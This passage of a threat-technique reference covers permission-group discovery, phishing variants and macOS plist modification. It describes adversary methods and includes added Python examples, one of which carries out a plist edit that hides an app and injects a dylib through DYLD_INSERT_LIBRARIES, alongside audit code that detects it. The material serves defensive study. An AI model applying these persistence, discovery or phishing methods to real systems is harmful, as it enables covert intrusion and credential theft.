Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated with a user account for Azure, while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources available to a user for Google.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup><sup>[[Google Cloud Identity API Documentation](https://app.tidalcyber.com/references/67f2719e-74fd-4bc1-9eeb-07d3095a5191)]</sup> In AWS, the <code>ListRolePolicies</code> and <code>ListAttachedRolePolicies</code> API calls allow users to enumerate the policies attached to a role.<sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API <sup>[[AWS Get Bucket ACL](https://app.tidalcyber.com/references/1eddbd32-8314-4f95-812a-550904eac2fa)]</sup>. Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

The tag is: misp-galaxy:technique="Cloud Groups"

Domain Groups

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

The tag is: misp-galaxy:technique="Domain Groups"

Local Groups

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.
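The commands above list group names; what an adversary (or an auditor) actually wants is who is in the privileged groups. As an added example for this page (not part of the MISP galaxy or ATT&CK), the Python below parses <code>/etc/group</code> and <code>/etc/passwd</code> and reports membership of groups that confer root or near-root rights, including users whose primary group is privileged, which a read of <code>/etc/group</code> alone misses. The sample file contents and the list of privileged group names are constructed assumptions.

```python
import sys
from typing import Dict, List, Set

# Constructed /etc/group and /etc/passwd contents (not from a real host).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice,bob
wheel:x:10:
adm:x:4:alice
docker:x:999:carol
users:x:100:
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
carol:x:1002:1002::/home/carol:/bin/bash
dave:x:1003:27::/home/dave:/bin/bash
"""

# Assumed list: groups whose membership is root-equivalent or close to it on a
# typical Linux host (docker/lxd/disk allow trivial escalation to root).
PRIVILEGED_GROUPS = ("root", "sudo", "wheel", "admin", "adm", "docker", "lxd", "disk")


def parse_group(text: str) -> Dict[str, dict]:
    """name -> {'gid': int, 'members': set} from /etc/group (name:pw:gid:members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": {m for m in members.split(",") if m}}
    return groups


def parse_passwd(text: str) -> Dict[str, int]:
    """user -> primary gid from /etc/passwd (name:pw:uid:gid:gecos:home:shell)."""
    out = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        out[fields[0]] = int(fields[3])
    return out


def members_of(group: str, groups: Dict[str, dict], passwd: Dict[str, int]) -> Set[str]:
    """Supplementary members listed in /etc/group plus users whose primary gid is
    this group; the second kind never appears in the /etc/group member list."""
    if group not in groups:
        return set()
    gid = groups[group]["gid"]
    primary = {user for user, g in passwd.items() if g == gid}
    return groups[group]["members"] | primary


def privileged_members(group_text: str, passwd_text: str) -> Dict[str, List[str]]:
    """Privileged groups that have at least one member, with sorted member lists."""
    groups, passwd = parse_group(group_text), parse_passwd(passwd_text)
    result = {}
    for name in PRIVILEGED_GROUPS:
        members = members_of(name, groups, passwd)
        if members:
            result[name] = sorted(members)
    return result


if __name__ == "__main__":
    # Usage: python3 local_groups.py /etc/group /etc/passwd   (defaults to the sample)
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as g, open(sys.argv[2]) as p:
            group_text, passwd_text = g.read(), p.read()
    else:
        group_text, passwd_text = SAMPLE_GROUP, SAMPLE_PASSWD
    for name, users in privileged_members(group_text, passwd_text).items():
        print(f"{name}: {', '.join(users)}")
```

In the sample, dave is never named in <code>/etc/group</code> but has primary gid 27 and is therefore in sudo; that is exactly the kind of member that a quick <code>grep sudo /etc/group</code> overlooks on both sides of the engagement.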

The tag is: misp-galaxy:technique="Local Groups"

Permission Groups Discovery

Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.<sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup>

The tag is: misp-galaxy:technique="Permission Groups Discovery"

Spearphishing Attachment - Duplicate

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:technique="Spearphishing Attachment - Duplicate"

Spearphishing Link - Duplicate

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup> URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to Steal Application Access Token.<sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. <sup>[[Microsoft OAuth 2.0 Consent Phishing 2021](https://app.tidalcyber.com/references/393e44fe-cf52-4c39-a79f-f7cdd9d8e16a)]</sup>

The tag is: misp-galaxy:technique="Spearphishing Link - Duplicate"

Spearphishing via Service

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:technique="Spearphishing via Service"

Spearphishing Voice - Duplicate

Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it relies on manipulating a user into providing access to systems through a phone call or other forms of voice communication. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries do not send malware to the victim directly but instead rely on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools ([Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430)) onto their computer.<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>

Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289) in order to trick users into divulging MFA credentials or accepting authentication prompts.<sup>[[Proofpoint Vishing](https://app.tidalcyber.com/references/7a200d34-b4f3-5036-8582-23872ef27eb1)]</sup>

The tag is: misp-galaxy:technique="Spearphishing Voice - Duplicate"

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup> Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender, which can be used to fool both the human recipient and automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup>

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>

The tag is: misp-galaxy:technique="Phishing"

Spearphishing Attachment

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.<sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Attachment"

Spearphishing Link

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.<sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup> The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>
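The URL tricks named above, here and under the "Spearphishing Link - Duplicate" entry (text before an "@" being discarded as userinfo, integer or hexadecimal hosts, and IDN homographs), can be undone mechanically when triaging a reported message. The Python below is an added example for this page, not code from MISP or from the cited reports; the URLs it is run on are constructed (the <code>hxxp://google.com@1157586937</code> form follows the text), and the homograph signals it reports are heuristics, not a full confusables check.

```python
import ipaddress
import re
import unicodedata
from typing import Dict, List
from urllib.parse import urlsplit


def normalize_scheme(url: str) -> str:
    """Turn defanged hxxp:// and hxxps:// back into parseable schemes."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def real_host(url: str) -> str:
    """Host a browser actually connects to.

    urlsplit() treats everything before '@' in the authority as userinfo and
    drops it, so 'google.com' in hxxp://google.com@1157586937 never reaches DNS.
    A host that is a bare decimal or hexadecimal integer is rendered as the
    dotted-quad IPv4 address it denotes.
    """
    host = urlsplit(normalize_scheme(url)).hostname  # already lower-cased
    if host is None:
        raise ValueError(f"no host in {url!r}")
    if re.fullmatch(r"\d+", host):
        return str(ipaddress.IPv4Address(int(host)))
    if re.fullmatch(r"0x[0-9a-f]+", host):
        return str(ipaddress.IPv4Address(int(host, 16)))
    return host


def decode_label(label: str) -> str:
    """Render an xn-- (punycode) label as the Unicode the user would see."""
    if label.startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label
    return label


def homograph_flags(host: str) -> List[str]:
    """Signals that a hostname may imitate another with look-alike characters:
    punycode labels, any non-ASCII, and labels mixing scripts (e.g. Cyrillic 'a'
    inside an otherwise Latin word). A whole-script confusable (all Cyrillic)
    only triggers the first two, which is why those are reported separately."""
    flags = []
    labels = host.split(".")
    if any(label.startswith("xn--") for label in labels):
        flags.append("punycode")
    decoded = [decode_label(label) for label in labels]
    if any(ord(c) > 127 for label in decoded for c in label):
        flags.append("non-ascii")
    for label in decoded:
        scripts = {unicodedata.name(c, "?").split()[0] for c in label if c.isalpha()}
        if len(scripts) > 1:
            flags.append("mixed-script:" + ",".join(sorted(scripts)))
    return flags


def analyze(url: str) -> Dict[str, object]:
    """Everything an analyst wants to see next to a reported link."""
    host = real_host(url)
    return {
        "host": host,
        "display_host": ".".join(decode_label(label) for label in host.split(".")),
        "flags": homograph_flags(host),
    }


if __name__ == "__main__":
    # Constructed samples; the first two resolve to the same address.
    for u in ("hxxp://google.com@1157586937/", "http://user:pw@0x44FF5FF9/login",
              "https://\u0430pple.com/", "https://login.example.com/"):
        print(u, "->", analyze(u))
```

On the page's own example the connection goes to 68.255.95.249, not to google.com. Note that <code>real_host</code> only covers the decimal and hexadecimal forms the text names; browsers also accept octal and partially dotted forms, which a production parser should handle as well.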

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.<sup>[[NIST Web Bug](https://app.tidalcyber.com/references/b4362602-faf0-5b28-a147-b3153da1903f)]</sup>

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.<sup>[[ZScaler BitB 2020](https://app.tidalcyber.com/references/c2f01a3b-a164-59b7-be5d-5eec4eb69ee5)]</sup><sup>[[Mr. D0x BitB 2022](https://app.tidalcyber.com/references/447f6b34-ac3a-58d9-af96-aa1d947a3e0e)]</sup>

Adversaries can use phishing kits such as EvilProxy and Evilginx2 to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)) in addition to their username and password. This may enable the adversary to then bypass MFA via Web Session Cookie.<sup>[[Proofpoint Human Factor](https://app.tidalcyber.com/references/143e191f-9175-557b-8fe1-41dbe04867a6)]</sup>

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Link"

Spearphishing Service

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup> These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Service"

Spearphishing Voice

Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.<sup>[[BOA Telephone Scams](https://app.tidalcyber.com/references/ee1abe19-f38b-5127-8377-f13f57f2abcb)]</sup>

Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>

Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to tailor pretexts to be even more persuasive and believable for the victim.

The tag is: misp-galaxy:technique="Spearphishing Voice"

Phishing for Information

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup><sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup><sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup>

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup>

The tag is: misp-galaxy:technique="Phishing for Information"

Plist File Modification

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple’s Core Foundation DTD. Plist files can be saved in text or binary format.<sup>[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)]</sup>

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: Launch Agent/[Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).

For example, adversaries can add a malicious application path to the <code>~/Library/Preferences/com.apple.dock.plist</code> file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also add key-value pairs that set environment variables for the application, such as an <code>LSEnvironment</code> dictionary, to enable persistence via Dynamic Linker Hijacking.<sup>[[wardle chp2 persistence](https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)]</sup><sup>[[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]</sup>
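To make the plist edits concrete, the following Python is an added example (not from the MISP galaxy, ATT&CK or the cited sources). It performs the two modifications named above on a constructed <code>Info.plist</code>, setting <code>LSUIElement</code> and injecting <code>DYLD_INSERT_LIBRARIES</code> through <code>LSEnvironment</code> (the dyld variable is the assumed vehicle for the dynamic linker hijack), and then shows the checks a defender can run on either XML or binary plists to spot them. The bundle keys and the dylib path are assumptions.

```python
import plistlib
from typing import Dict, List

# Constructed minimal Info.plist (not taken from a real application bundle).
ORIGINAL_INFO_PLIST = {
    "CFBundleIdentifier": "com.example.notes",
    "CFBundleExecutable": "Notes",
    "CFBundleShortVersionString": "1.0",
}


def original_plist_bytes(binary: bool = False) -> bytes:
    """Serialise the sample bundle plist in XML (default) or binary form."""
    fmt = plistlib.FMT_BINARY if binary else plistlib.FMT_XML
    return plistlib.dumps(ORIGINAL_INFO_PLIST, fmt=fmt)


def adversary_modify(plist_bytes: bytes, dylib_path: str, binary: bool = False) -> bytes:
    """Apply the edits the text describes: LSUIElement hides the app from the Dock
    and app switcher; LSEnvironment/DYLD_INSERT_LIBRARIES makes dyld load the
    attacker's library into the process at every launch."""
    data = plistlib.loads(plist_bytes)          # accepts XML or binary input
    data["LSUIElement"] = True
    data.setdefault("LSEnvironment", {})["DYLD_INSERT_LIBRARIES"] = dylib_path
    fmt = plistlib.FMT_BINARY if binary else plistlib.FMT_XML
    return plistlib.dumps(data, fmt=fmt)


def audit_info_plist(plist_bytes: bytes) -> List[str]:
    """Findings worth alerting on when scanning bundles on disk."""
    data = plistlib.loads(plist_bytes)
    findings = []
    if data.get("LSUIElement") in (True, 1, "1"):
        findings.append("LSUIElement is set: app runs without Dock icon or menu bar")
    for key, val in data.get("LSEnvironment", {}).items():
        if key.startswith("DYLD_"):
            findings.append(f"LSEnvironment injects {key}={val}")
    return findings


def plist_diff(before: bytes, after: bytes) -> Dict[str, tuple]:
    """Keys added, removed or changed between a known-good copy and the current file."""
    a, b = plistlib.loads(before), plistlib.loads(after)
    return {k: (a.get(k), b.get(k)) for k in set(a) | set(b) if a.get(k) != b.get(k)}


if __name__ == "__main__":
    good = original_plist_bytes()
    bad = adversary_modify(good, "/Users/Shared/.cache/libhelper.dylib", binary=True)
    print("findings:", audit_info_plist(bad))
    print("changed keys:", sorted(plist_diff(good, bad)))
```

Because <code>plistlib.loads</code> detects the format itself, converting a modified plist to binary (which many editors and <code>plutil</code> do silently) does not hide the change from the audit; comparing against a golden copy via <code>plist_diff</code> also catches keys this audit does not name.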

The tag is: misp-galaxy:technique="Plist File Modification"

Power Settings

Adversaries may impair a system’s ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.<sup>[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]</sup>

